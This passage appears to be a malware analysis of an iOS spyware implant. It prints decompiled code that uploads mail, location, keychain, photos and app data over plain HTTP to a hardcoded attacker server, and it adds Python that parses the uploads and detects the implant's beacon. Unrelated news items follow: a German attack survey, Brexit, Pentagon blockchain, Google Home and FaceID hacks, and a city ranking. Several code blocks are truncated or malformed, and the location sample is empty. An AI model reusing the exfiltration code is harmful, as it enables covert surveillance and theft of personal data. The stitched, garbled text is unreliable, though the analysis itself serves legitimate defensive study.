  // block until the completion handler signals the semaphore
  dispatch_semaphore_wait(sem, -1);

The IP address of the server to upload content to is hardcoded in the implant binary. This function uses that address to make an HTTP POST request, passing the contents of the files provided in the files argument as a multipart/form-data payload (with the hardcoded boundary string “9ff7172192b7” delimiting the fields in the body data.)

Let’s take a quick look at buildBodyDataWithParams:

-[Service buildBodyDataWithParams:params AndFiles:files] {
  data = [NSMutableData data];
  // one form-data part per parameter
  for (key in params) {
    str = [NSMutableString string];
    // the boundary string
    [str appendFormat:@"--%@\r\n", @"9ff7172192b7"];
    [str appendFormat:
      @"Content-Disposition: form-data; name=\"%@\"\r\n\r\n", key];
    val = [params objectForKeyedSubscript:key];
    [str appendFormat:@"%@\r\n", val];
    encoded = [str dataUsingEncoding:NSUTF8StringEncoding];
    [data appendData:encoded];
  }
  // one octet-stream part per file, contents read from /tmp
  for (file in files) {
    str = [NSMutableString string];
    // the boundary string
    [str appendFormat:@"--%@\r\n", @"9ff7172192b7"];
    [str appendFormat:
      @"Content-disposition: form-data; name=\"%@\"; filename=\"%@\"\r\n",
      file, file];
    [str appendFormat:@"Content-Type: application/octet-stream\r\n\r\n"];
    encoded = [str dataUsingEncoding:NSUTF8StringEncoding];
    [data appendData:encoded];
    file_path = [files objectForKeyedSubscript:file];
    file_data = [NSData dataWithContentsOfFile:file_path];
    [data appendData:file_data];
    newline_encoded = [@"\r\n" dataUsingEncoding:NSUTF8StringEncoding];
    [data appendData:newline_encoded];
  }
  // closing boundary
  final_str = [NSString stringWithFormat:@"--%@--\r\n", @"9ff7172192b7"];
  final_encoded = [final_str dataUsingEncoding:NSUTF8StringEncoding];
  [data appendData:final_encoded];
  return data;
}

This is just building a typical HTTP POST request body, embedding the contents of each file as form data.

There’s something thus far which is conspicuous only by its absence: is any of this encrypted? The short answer is no: they really do POST everything via HTTP (not HTTPS) and there is no asymmetric (or even symmetric) encryption applied to the data which is uploaded. Everything is in the clear. If you’re connected to an unencrypted WiFi network this information is being broadcast to everyone around you, to your network operator and any intermediate network hops to the command and control server.

This means that not only is the end-point of the end-to-end encryption offered by messaging apps compromised; the attackers then send all the contents of the end-to-end encrypted messages in plain text over the network to their server.
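To make the upload format concrete, here is an added Python example (not code from the Project Zero post, and not the implant's own Objective-C) that rebuilds the multipart body exactly as [Service buildBodyDataWithParams:AndFiles:] lays it out, using the boundary string the post documents, and then does the inverse: splitting a captured body back into its form fields and uploaded files and reading the recovered device.plist with plistlib. Because the traffic is plain HTTP, this is all an analyst needs to recover what was exfiltrated from a packet capture. The plist values are constructed placeholders, not real identifiers.

```python
"""Rebuild and parse the implant's /upload/info multipart body.

Added example, not code from the Project Zero post: a Python reimplementation
of the layout that [Service buildBodyDataWithParams:AndFiles:] produces, plus
the inverse, so that a captured (plaintext) upload can be split back into its
form fields and the files that were exfiltrated. The boundary string is the
one the post documents; every value in the sample plist is constructed.
"""
import plistlib
import re
from typing import Dict, Tuple

BOUNDARY = b"9ff7172192b7"  # hardcoded in the implant (from the post)

# Constructed stand-in for what [Util dictOfDeviceInfo] writes to /tmp.
# Placeholder identifiers only; the keys are the ones the post lists.
SAMPLE_DEVICE_PLIST = plistlib.dumps({
    "name": "Test iPhone",
    "iccid": "8900000000000000000",
    "imei": "000000000000000",
    "SerialNumber": "SERIAL0000",
    "PhoneNumber": "",
    "version": "12.0",
    "totaldisk": 64.0,
    "freedisk": 12.5,
    "platform": "iPhone10,1",
    "net": "Wifi",
})


def build_body(params: Dict[str, str], files: Dict[str, bytes]) -> bytes:
    """Same layout as the implant: one form-data part per param, one
    application/octet-stream part per file, then the closing boundary."""
    body = bytearray()
    for key, val in params.items():
        body += b"--" + BOUNDARY + b"\r\n"
        body += b'Content-Disposition: form-data; name="' + key.encode() + b'"\r\n\r\n'
        body += val.encode() + b"\r\n"
    for name, data in files.items():
        body += b"--" + BOUNDARY + b"\r\n"
        body += (b'Content-disposition: form-data; name="' + name.encode()
                 + b'"; filename="' + name.encode() + b'"\r\n')
        body += b"Content-Type: application/octet-stream\r\n\r\n"
        body += data + b"\r\n"
    body += b"--" + BOUNDARY + b"--\r\n"
    return bytes(body)


def parse_body(body: bytes) -> Tuple[Dict[str, str], Dict[str, bytes]]:
    """Inverse of build_body for a captured request body: returns
    (form fields, uploaded files). Parts carrying filename= are files."""
    fields: Dict[str, str] = {}
    files: Dict[str, bytes] = {}
    for part in body.split(b"--" + BOUNDARY)[1:]:
        if part.startswith(b"--"):          # closing boundary "--<b>--"
            break
        head, _, payload = part.partition(b"\r\n\r\n")
        if payload.endswith(b"\r\n"):       # newline the builder appends
            payload = payload[:-2]
        name = re.search(rb'; name="([^"]*)"', head).group(1).decode()
        if re.search(rb'; filename="', head):
            files[name] = payload
        else:
            fields[name] = payload.decode()
    return fields, files


def recover_device_info(body: bytes) -> Tuple[str, dict]:
    """Pull the "sn" field and the device.plist dictionary out of a captured
    upload, the way an analyst would from a pcap of this traffic."""
    fields, files = parse_body(body)
    return fields["sn"], plistlib.loads(files["device.plist"])


if __name__ == "__main__":
    captured = build_body({"sn": "SERIAL0000"}, {"device.plist": SAMPLE_DEVICE_PLIST})
    print(recover_device_info(captured))
```

The same parse_body works for the other bulk uploads the post lists (contacts, keychain, tar archives of app containers), since they all go through postFiles with the same boundary; only the file names in the returned dictionary differ.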

The command loop

On initial run (immediately after the iPhone has been exploited) the implant performs around a dozen bulk uploads in a similar fashion before going to sleep and being woken up by the operating system every 60 seconds. Let’s look at what happens then:

NSTimer will ensure that the [Service timer_handle] method is called every 60 seconds:

-[Service timer_handle] {
  NSLog(@"timer trig");
  [self status];
  [self cmds];
}

[Service status] uses the SystemConfiguration framework to determine whether the device is currently connected via WiFi or mobile data network.

[Service cmds] calls [Service remotelist]:

-[Service cmds] {
  [self remotelist];
}

-[Service remotelist] {
  ws_nl = [NSCharacterSet whitespaceAndNewlineCharacterSet];
  url_str = [remote_url_long stringByTrimmingCharactersInSet:ws_nl];
  NSMutableURLRequestRef url_req = [NSMutableURLRequest alloc];
  full_url_str = [url_str stringByAppendingString:@"/list"];
  NSURLRef url = [NSURL URLWithString:full_url_str];
  [url_req initWithURL:url];
  if (self->_cookies) {
    [url_req addValue:self->_cookies forHTTPHeaderField:@"Cookie"];
  NSURLResponse* resp;
  NSData* data = [NSURLConnection sendSynchronousRequest:url_req
  // keep whatever cookie the server set for the next request
  cookie = [self getCookieFromHttpresponse:resp];
  if ([cookie length] != 0) {
    self->_cookie = cookie;
  NSLog(@"Json data %@", [NSString initWithData:data
  err = 0;
  json = [NSJSONSerialization JSONObjectWithData:data
  data_obj = [json objectForKey:@"data"];
  NSLog(@"data Result: %@", data_obj);
  cmds_obj = [data_obj objectForKey:@"cmds"];
  NSLog(@"cmds: %@", cmds_obj);
  for (cmd in cmds_obj) {
    [self doCommand:cmd];

This method makes an HTTP request to the /list endpoint on the command and control server and expects to receive a JSON-encoded object in the response. It parses that object using the system JSON library (NSJSONSerialization), expecting the JSON to be in the following form:

{ “data” :
  { “cmds” :
      {“cmd”  : <COMMAND_STRING>
       “data” : <OPTIONAL_DATA_STRING>
      }, …

Each of the enclosed commands are passed in turn to [Service doCommand]:

-[Service doCommand:cmd_dict] {
  cmd_str_raw = [cmd_dict objectForKeyedSubscript:@"cmd"]
  cmd_str = [cmd_str_raw stringByTrimmingCharactersInSet:
               [NSCharacterSet whitespaceAndNewlineCharacterSet]];
  if ([cmd_str isEqualToString:@"systemmail"]) {
    [self requestSystemMail];
  } else if([cmd_str isEqualToString:@"device"]) {
    [self uploadDevice];
  } else if([cmd_str isEqualToString:@"locate"]) {
    [self requestLocation];
  } else if([cmd_str isEqualToString:@"contact"]) {
    [self requestContact];
  } else if([cmd_str isEqualToString:@"callhistory"]) {
    [self requestCallHistory];
  } else if([cmd_str isEqualToString:@"message"]) {
    [self requestMessage];
  } else if([cmd_str isEqualToString:@"notes"]) {
    [self requestNotes];
  } else if([cmd_str isEqualToString:@"applist"]) {
    [self requestApps];
  } else if([cmd_str isEqualToString:@"keychain"]) {
    [self requestKeychain];
  } else if([cmd_str isEqualToString:@"recordings"]) {
    [self requestRecordings];
  } else if([cmd_str isEqualToString:@"msgattach"]) {
    [self requestSmsAttachments];
  } else if([cmd_str isEqualToString:@"priorapps"]) {
    if (!self->_defaultList) {
      self->_defaultList = [Util appPriorLists]
    }
    [self requestPriorAppData:self->_defaultList]
  } else if([cmd_str isEqualToString:@"photo"]) {
    [self uploadPhoto];
  } else if([cmd_str isEqualToString:@"allapp"]) {
    dispatch_async(_dispatch_main_q, ^(app)
        [self requestAllAppData:app]
  } else if([cmd_str isEqualToString:@"app"]) {
    // parameter should be an array of bundle ids
    data = [cmd_dict objectForKey:@"data"]
    if ([data count] != 0) {
      [self requestPriorAppData:data]
    }
  } else if([cmd_str isEqualToString:@"dl"]) {
    [@"/tmp/evd." stringByAppendingString:[[[NSUUID UUID] UUIDString] substringToIndex: 4]]
    // it doesn't actually seem to do anything here
  } else if([cmd_str isEqualToString:@"shot"]) {
    // nop
  } else if([cmd_str isEqualToString:@"live"]) {
    // nop
  }
  // report completion of the command to the server
  cs = [NSCharacterSet whitespaceAndNewlineCharacterSet];
  server = [@"http://X.X.X.X:1234" stringByTrimmingCharactersInSet:cs];
  full_url_str = [server stringByAppendingString:@"/list/suc?name="];
  url = [NSURL URLWithString:[full_url_str stringByAppendingString:cmd_str]];
  NSLog(@"s_url: %@", url)
  req = [[NSMutableURLRequest alloc] initWithURL:url];
  if (self->_cookies) {
    [req addValue:self->_cookies forHTTPHeaderField:@"Cookie"];
  }
  id resp;
  [NSURLConnection sendSynchronousRequest:req
                   returningResponse: &resp
                   error: nil];
  resp_cookie = [self getCookieFromHttpresponse:resp]
  if ([resp_cookie length] == 0) {
    self->_cookie = nil;
  } else {
    self->_cookie = resp_cookie;
  }
  NSLog(@"cookies: %@", self->_cookie)
}

This method takes a dictionary with a command and an optional data argument. Here’s a list of the supported commands:

systemmail  : upload email from the default Mail app
device      : upload device identifiers
              (IMEI, phone number, serial number etc.)
locate      : upload location from CoreLocation
contact     : upload contacts database
callhistory : upload phone call history
message     : upload iMessage/SMSes
notes       : upload notes made in the built-in Notes app
applist     : upload a list of installed non-Apple apps
keychain    : upload passwords and certificates stored in the keychain
recordings  : upload voice memos made using the built-in voice memos app
msgattach   : upload SMS and iMessage attachments
priorapps   : upload app-container directories from a hardcoded list of
              third-party apps, if installed (appPriorLists)
photo       : upload photos from the camera roll
allapp      : upload container directories of all apps
app         : upload container directories of particular apps by bundle ID
dl          : unimplemented
shot        : unimplemented
live        : unimplemented

Each command is responsible for uploading its results to the server. After each command completes, a GET request is made to the /list/suc?name=X endpoint, where X is the name of the command that completed. A cookie containing the device serial number is sent along with the GET request, and whatever cookie the server returns in its response replaces the stored one (it is cleared if the response carries none).
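That completion beacon is a usable network indicator. The following is an added detection example, not code from the original post or from the implant: it scans constructed proxy log lines for the GET /list/suc?name=<command> request, accepts only names from the implant's own command set (so unrelated /list/suc URLs do not match), records the cookie each client sent, and turns the list of completed commands into a summary of what data must be assumed uploaded. The log line format, the server address 203.0.113.5:1234 and the cookie values are assumptions made for this example.

```python
"""Flag the implant's per-command completion beacon in HTTP proxy logs.

Added example, not code from the original post or the implant. The observable
is the one described above: after each command the implant issues
GET /list/suc?name=<command>, sending its stored cookie (which carries the
device serial number). Log format, server address and cookie values below are
constructed for this example; adapt parse_line() to your proxy's format.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Command names exactly as dispatched by the -[Service ...] switch above.
IMPLANT_COMMANDS = frozenset({
    "systemmail", "device", "locate", "contact", "callhistory", "message",
    "notes", "applist", "keychain", "recordings", "msgattach", "priorapps",
    "photo", "allapp", "app", "dl", "shot", "live",
})
# What a completed command means was uploaded (from the command list above).
EXPOSURE = {
    "systemmail": "local email store",
    "device": "device identifiers (IMEI, phone number, serial number)",
    "locate": "GPS location",
    "contact": "contacts database",
    "callhistory": "call history",
    "message": "iMessage/SMS content",
    "notes": "notes",
    "applist": "list of installed third-party apps",
    "keychain": "keychain: passwords, certificates and auth tokens",
    "recordings": "voice memos",
    "msgattach": "SMS/iMessage attachments",
    "priorapps": "container directories of targeted third-party apps",
    "photo": "camera roll",
    "allapp": "container directories of all apps",
    "app": "container directories of requested apps",
}
# Constructed proxy log: "<client> <method> <url> <status> cookie=<value|->"
SAMPLE_LOG = """\
10.0.0.7 GET http://203.0.113.5:1234/list/suc?name=device 200 cookie=F1A2B3C4
10.0.0.7 POST http://203.0.113.5:1234/upload 200 cookie=F1A2B3C4
10.0.0.7 GET http://203.0.113.5:1234/list/suc?name=keychain 200 cookie=F1A2B3C4
10.0.0.9 GET http://example.org/list/suc?name=login 200 cookie=-
10.0.0.12 GET http://203.0.113.5:1234/list/suc?name=locate 200 cookie=-
"""
LINE_RE = re.compile(
    r"^(?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3}) "
    r"cookie=(?P<cookie>\S+)$"
)


def parse_line(line):
    """Parse one constructed log line into a dict, or None if it does not fit."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def beacon_command(method, url):
    """Return the command name if this request is the completion beacon, else None.

    Requiring the exact path, exactly one `name` parameter and a name from the
    implant's own command set keeps unrelated /list/suc URLs from matching.
    """
    if method != "GET":
        return None
    parts = urlsplit(url)
    if parts.path != "/list/suc":
        return None
    names = parse_qs(parts.query).get("name", [])
    if len(names) != 1 or names[0] not in IMPLANT_COMMANDS:
        return None
    return names[0]


def find_beacons(log_text):
    """Group matched beacons by client: {client: {server, cookie, commands}}."""
    hits = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        cmd = beacon_command(rec["method"], rec["url"])
        if cmd is None:
            continue
        entry = hits.setdefault(rec["client"], {
            "server": urlsplit(rec["url"]).netloc, "cookie": None, "commands": []})
        if rec["cookie"] != "-":
            entry["cookie"] = rec["cookie"]   # serial-number cookie, if present
        entry["commands"].append(cmd)
    return hits


def exposure(commands):
    """Sorted list of data categories confirmed uploaded by the given beacons."""
    return sorted({EXPOSURE[c] for c in commands if c in EXPOSURE})


if __name__ == "__main__":
    for client, info in find_beacons(SAMPLE_LOG).items():
        print(client, "->", info["server"], "cookie:", info["cookie"])
        for item in exposure(info["commands"]):
            print("   uploaded:", item)
```

The real implant's server is a hardcoded plain http:// URL, so the beacon is visible to any proxy or network sensor on the path; match on the path and the command-name set rather than on the address, which is the part an operator changes most easily.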

The majority of these commands work by creating tar archives of fixed lists of directories based on the desired information and the version of iOS which is running. Here, for example, is the implementation of the systemmail command:

-[Service requestSystemMail] {
  maildir = [Util dirOfSystemMail];
  if ([maildir length] != 0) {
    [Util tarWithSplit:maildir
                 block:^(id files) {   // dictionary {filename:filepath}
                   // retry the upload every 10 seconds until postFiles: succeeds
                   while ([self postFiles:files] == 0) {
                     [NSThread sleepForTimeInterval:10.0];
                   }
                 }];
  }
}

+[Util dirOfSystemMail] {
  return @"/private/var/mobile/Library/Mail";
}

This uses the [Util tarWithSplit] method to archive the contents of the /private/var/mobile/Library/Mail folder, which holds all locally-stored email sent and received with the built-in Apple Mail app.

Here's another example of a command, locate, which uses CoreLocation to request a geolocation fix for the device. Because the implant has the entitlement set to true, this does not prompt the user for permission to access their location.

-[Service requestLocation] {
  self->_locating = 1;
  if (!self->_lm) {
    lm = [[CLLocationManager alloc] init];
    [self->_lm release];
    self->_lm = lm;
    // the delegate's locationManager:didUpdateLocations: selector
    // will be called when location information is available
    [self->_lm setDelegate:self];
    [self->_lm setDesiredAccuracy:kCLLocationAccuracyBest];
  }
  [self->_lm startUpdatingLocation];
}

-[Service locationManager:manager didUpdateLocations:locations] {
  [manager stopUpdatingLocation];
  loc = [locations lastObject];
  if (self->_locating) {
    struct CLLocationCoordinate2D coord = [loc coordinate];
    dict = @{@"lat" : [NSNumber numberWithDouble:coord.latitude],
             @"lon" : [NSNumber numberWithDouble:coord.longitude]};
    // written to a random path under /tmp, uploaded under the name
    // gps.plist and removed after a successful upload (remove:1)
    path = [@"/tmp" stringByAppendingPathComponent:[[NSUUID UUID] UUIDString]];
    [dict writeToFile:path atomically:1];
    fdict = @{@"gps.plist" : path};
    // same retry pattern as the other commands: try again every 10 seconds
    while ([self postFiles:fdict remove:1] == 0) {
      [NSThread sleepForTimeInterval:10.0];
    }
  }
}

Here’s the response to the location command, which can be sent up to every 60 seconds (note: I have changed the location to be the peak of the Matterhorn in Switzerland):

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "">
<plist version="1.0">

App contents

Various implant commands enable the attackers to steal the container directories of third-party apps. The implant contains a hardcoded list of apps which will always have their container directories uploaded when the implant starts up. The command-and-control server can also query for a list of all 3rd party apps and request uploads of their container directories.

These container directories are where most iOS apps store all their data; for example, this is where end-to-end encryption apps store unencrypted copies of all sent and received messages.

Here’s the pre-populated list of bundle identifiers for third-party apps, which will always have their container directories uploaded if the apps are installed:

If the attackers were interested in other apps installed on the device, they could use a combination of the applist and app commands to get a listing of all installed bundle IDs and then upload a particular app's container directory by ID. The allapp command uploads the container directories of every app on the device.


The implant has access to almost all of the personal information on the device and uploads it, unencrypted over plain HTTP, to the attacker's server. The implant binary does not persist: if the phone is rebooted, the implant will not run again until the device is re-exploited when the user next visits a compromised site. Given the breadth of information stolen, the attackers may nevertheless retain persistent access to various accounts and services by using the authentication tokens stolen from the keychain, even after they lose access to the device itself.





Do Something About It? Companies are suffering massively from hackers

Large corporations in particular are in hackers' sights. The density of attacks has been rising for years, according to a study.

Study on cyber attacks

The internet is an increasingly dangerous space. A study concludes that the dangers to the German economy, society and politics from attacks out of cyberspace have risen further. Many companies now report daily attacks.

The large majority of German companies have already had painful experiences with internet threats. 85 percent of all medium-sized and large companies in Germany see themselves exposed to cyber attacks. That is the finding of a study by the Institut für Demoskopie Allensbach commissioned by the auditing firm Deloitte. According to it, 28 percent of firms report daily attacks, and at a further 19 percent this happens at least once a week.

Large companies in particular have to deal with cyber attacks: 40 percent of firms with 1,000 or more employees face them daily. According to the Cyber Security Report, the frequency of attacks has increased compared with previous years. At roughly one in five companies such attacks have already caused noticeable, and in some cases even massive, damage, the report says.

Besides attacks on IT systems, companies also face various threats arising from social networks. Around a quarter of companies report attempts to damage the firm's reputation through targeted false information on the internet. Nevertheless, only about half systematically track what is said about their organization on social networks.

Fake news at the top of the risk ranking

For the report on cyber risks and IT security, the Institut für Demoskopie Allensbach surveyed hundreds of executives from large and medium-sized companies as well as members of the Bundestag, the state parliaments and the European Parliament. Both parliamentarians and companies put fake news at the top of their risk ranking. "Social media are profoundly changing information behaviour and political discourse. The scope of this development is not yet remotely recognized. The concern of many parliamentarians is entirely understandable," said Renate Köcher, managing director of the Institut für Demoskopie Allensbach.

At the same time, companies rated many dangers higher than the parliamentarians did. 73 percent of the business respondents but only 58 percent of the politicians fear data fraud on the internet. Intrusions into citizens' privacy through networked home technology were rated a growing security risk by 55 percent of the business respondents and 43 percent of the politicians.

Business leaders and parliamentarians agree that politics can contribute to combating cyber risks in companies. 90 percent of company representatives held this view; politicians agreed 100 percent. Since at the same time only nine percent of managers are familiar with government institutions in the field of cyber security, the study's authors recommend greater exchange in this area.


Source: mau





140,000 Germans directly affected by Brexit

After a hard Brexit, the British government wants to abolish freedom of movement for new arrivals from the European Union. Those already living in the country may stay, but to do so EU citizens living in the country must register with the authorities. So far only around one million of the more than 3.5 million people affected have done so. The Office for National Statistics estimates the number of Germans living in the United Kingdom at 140,000. By far the largest immigrant group is the 905,000 Polish citizens.




US Defense Department to Develop Blockchain Cybersecurity Shield

The U.S. Department of Defense (DoD) is looking to forge a blockchain cybersecurity shield.

In a report published on July 12 titled Digital Modernization Strategy, the DoD outlined several ways to advance the nation’s digital defenses. This includes the integration of cloud and quantum computing, artificial intelligence, and improved communications through distributed ledgers.

In fact, DARPA, the Department's research wing, is already experimenting with the technology "to create a more efficient, robust, and secure platform" for secure messaging and transaction processing, Decrypt reports.

Specifically, blockchain may be deployed between units and headquarters as well as intelligence officers and the Pentagon. As part of the Digital Identity Management program, the agency may also issue a digital token that authenticates an agent’s identity.

The DoD is also experimenting with the technology to facilitate the creation of an unhackable code to secure its databases.

As part of the second Cryptographic Modernization program, in effect since 2000, the Department is replacing old hardware and cryptographic systems to meet the challenges of the improved computing power of the nation’s adversaries.

Citing the trustless, transparent, and immutable attributes of blockchain, the Department writes:

“Blockchain networks not only reduce the probability of compromise, but also impose significantly greater costs on an adversary to achieve it.”

The shift from "low value to high-value work" is also part of the DoD's Big Data Platform (BDP), which will handle petabytes of data involved in a number of cross-agency projects. The platform "provides the ability to perform aggregation, correlation, historical trending," and may perform pattern recognition to "predict attacks."





DEF CON 2019: Researchers Demo Hacking Google Home

Researchers show how they hacked Google Home smart speakers using the Magellan vulnerability.

LAS VEGAS – The Tencent Blade Team of researchers demonstrated several ways they have developed to hack and run remote code on Google Home smart speakers. The hacks center around what is known as the Magellan vulnerability, which can be used to exploit the massively popular SQLite database engine.

Here at a session at DEF CON on Thursday, the researchers shed light on their work "breaking" Google Home. What made the talk unique wasn't necessarily that Google Home smart speakers could be compromised using Magellan – that was public news in Dec. 2018 – rather it was how the hack was pulled off.

On stage Tencent researchers Wenxiang Qian, YuXiang Li and HuiYu Wu laid out the evolution of their research.

The hack of Google Home first focused on hardware, similar to the researchers' approach when compromising Amazon Echo, made public last year at DEF CON. In the Echo case, researchers tampered with the flash hardware chips to create the attack scenario. In the case of Google Home, it was a bit trickier because researchers couldn't find a hardware interface for debugging and flashing, as they had with the Amazon Echo hack.

So in this instance, researchers found clues to pull off their hack by extracting the Google Home firmware, through dumping it from the device’s NAND flash.

Because of secure boot and other OTA security verification mechanisms, researchers said directly tampering with firmware was out of the question.

“We designed a new adapter to export the pins of the test socket to a larger pitch. So, we can easily connect the chip to the programmer. Finally, it is used to read the firmware through the programmer,” researchers said.

From there they looked for weaknesses to exploit. One such method included an easy way to simulate an upgrade request (TLS). Researchers also identified a potential road to a Google Home compromise via the CAST protocol, used by Google Home to cast multimedia content from one smart device to another.

“We exploited the Magellan vulnerability to compromise cast_shell (the main program of Google Home). Through cast protocol, we can trigger Google Home to visit malicious web pages to exploit the Magellan vulnerability to exploit cast_shell,” researchers told Threatpost.

Magellan, a set of three heap buffer overflow and heap data disclosure vulnerabilities in SQLite (CVE-2018-20346, CVE-2018-20505 and CVE-2018-20506), affects a large number of browsers, IoT devices and smartphones that embed SQLite, including anything built on the open-source Chromium engine, which exposed SQLite to web content through WebSQL. As applied to Google Home, it can lead to remote code execution via weaknesses in the Chrome renderer, following the known Magellan attack technique against the SQLite flaw.

The researchers also expanded the attack surface of Google Home to include one based on a malicious app. In this example, an attacker posts a malicious Cast app to an app store. Now an attacker can remotely trigger Google Home to load the malicious app in the LAN. Next, Google Home is forced to visit a malicious URL via an embedded Chrome browser- triggering the Magellan attack.

The good news is, according to the researchers, there are no indications that Magellan has been abused in the wild.

“We have reported all the details of the vulnerability to Google and they have fixed the vulnerability. If your product uses Chromium, please update to the official stable version 71.0.3578.80 (or above). If your product uses SQLite, please update to 3.26.0 (or latest release).”





Black Hat USA 2019: Researchers Bypass Apple FaceID Using Biometrics ‘Achilles Heel’

“X-Glasses” made by Tencent researchers to bypass FaceID biometrics detection

Researchers were able to bypass Apple’s FaceID using a pair of glasses with tape on the lenses.

LAS VEGAS – Vulnerabilities have been uncovered in the authentication process of biometrics technology that could allow bad actors to bypass various facial recognition applications – including Apple’s FaceID. But there is a catch. Doing so requires the victim to be out cold.

Researchers on Wednesday during Black Hat USA 2019 demonstrated an attack that allowed them to bypass a victim's FaceID and log into their phone simply by putting a pair of modified glasses on the victim's face. By carefully placing tape over the lenses of a pair of glasses and putting them on the victim's face, the researchers showed how they could bypass Apple's FaceID in a specific scenario. The attack itself is difficult, given the bad actor would need to figure out how to put the glasses on an unconscious victim without waking them up.

To launch the attack, researchers with Tencent tapped into a feature behind biometrics called “liveness” detection, which is part of the biometric authentication process that sifts through “real” versus “fake” features on people. It works by detecting background noise, response distortion or focus blur. One such biometrics tool that utilizes liveness detection is FaceID, which is designed and utilized by Apple for the iPhone and iPad Pro.

“With the leakage of biometric data and the enhancement of AI fraud ability, liveness detection has become the Achilles’ heel of biometric authentication security as it is to verify if the biometric being captured is an actual measurement from the authorized live person who is present at the time of capture,” researchers said during the Black Hat USA 2019 session, titled “Biometric Authentication Under Threat: Liveness Detection Hacking.”

While previous attacks have focused on generating fake data to bypass biometrics, these types of audio or video attacks consist of various components – including stealing the victim's device fingerprint, generating fake audio and video, and hardware-level injection – and involve several moving parts, Zhuo Ma, with Tencent Security, said.

Instead, researchers decided to focus on liveness detection, which allows users to unlock their phone with one glance, hoping to bypass the feature by using an actual victim’s face while they are unconscious.

“It comes with challenges, you don’t want to wake up a sleeping victim, and 3D systems are difficult to forge… you want a low cost solution with a high success rate,” said Ma.

Researchers specifically homed in on how liveness detection scans a user's eyes. They discovered that the abstraction of the eye used for liveness detection renders a black area (the eye) with a white point on it (the iris). And they discovered that if a user is wearing glasses, the way liveness detection scans the eyes changes.

“After our research we found weak points in FaceID… it allows users to unlock while wearing glasses… if you are wearing glasses, it won’t extract 3D information from the eye area when it recognizes the glasses.”

Putting these two factors together, the researchers created a prototype of glasses – dubbed "X-glasses" – with black tape on the lenses and white tape inside the black tape. Using this trick they were able to unlock a victim's mobile phone and then transfer his money through a mobile payment app by placing the taped glasses over the sleeping victim's face, bypassing the attention detection mechanism of FaceID and other similar technologies.

The attack comes with obvious drawbacks – the victim must be unconscious, for one, and can’t wake up when the glasses are placed on their face. However, it does show the weaknesses behind the security and design of liveness detection and biometrics in general, researchers said.

In terms of mitigations, researchers suggested that biometrics manufacturers add identity authentication for native cameras and increase the weight of video and audio synthesis detection.

Biometrics have been at the center of attention this year as security experts wonder whether the new technology will create increased security or a new threat attack vector. It was discussed widely at Black Hat USA 2018 as well, with new vulnerabilities in voice authentication being uncovered.





Global Top 10 best cities to live and work in: 3 of those are in Germany

Three cities in Germany rank among the top ten most liveable cities in the world. In a current ranking, the company Kisi rated metropolises worldwide by the best work-life balance.

The factors included both

  • hard data such as the unemployment rate,
  • the number of weekly working hours,
  • the available vacation days and
  • access to health care,
  • as well as soft factors such as equality between men and women,
  • tolerance toward lesbians and gays,
  • the happiness index,
  • air pollution and
  • the leisure offerings in a city.

The result: first place goes to the Finnish capital Helsinki, with a top score of 100 points. The German city of Munich reaches second place with an index value of 98.3 points. With Hamburg (rank 4) and Berlin (rank 6), two further German metropolises even made it into the top 10 of the most liveable cities worldwide.

In last place of the 40 cities rated overall was Malaysia's capital Kuala Lumpur: it achieved only one of 100 possible points.
